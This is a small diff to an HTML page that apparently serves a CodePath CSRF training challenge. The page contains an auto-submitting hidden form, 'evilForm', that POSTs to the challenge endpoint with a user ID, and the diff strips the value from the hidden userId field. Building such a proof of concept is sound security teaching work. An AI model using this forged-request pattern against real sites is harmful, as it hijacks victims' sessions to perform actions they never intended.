--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
 </HEAD>
 <H1 style="font-family:'Orbitron';font-size:18px;width:250px">hmm..wonder what this does.</H1>
 <form name="evilForm" action="https://security.codepath.com/user/csrfchallengeone/plusplus?userid=121dd11bf97d0492aac80ef0f4b8beffc9734786" method="POST">
-    <input type="hidden" name="userId" value="121dd11bf97d0492aac80ef0f4b8beffc9734786" />
+    <input type="hidden"/>
     <input type="submit"/>
 </form>
 <script> document.evilForm.submit(); </script>
